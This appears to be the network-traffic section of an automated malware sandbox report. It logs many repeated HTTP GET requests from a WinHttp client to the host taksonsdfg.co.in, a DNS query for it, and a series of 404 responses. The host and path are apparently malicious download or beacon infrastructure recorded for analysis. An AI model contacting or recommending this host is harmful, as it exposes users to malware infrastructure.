      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficDNS traffic detected: DNS query: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:19 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:20 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:21 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:22 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:23 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:25 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:26 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:27 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:28 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:29 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:30 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:31 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:29:33 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
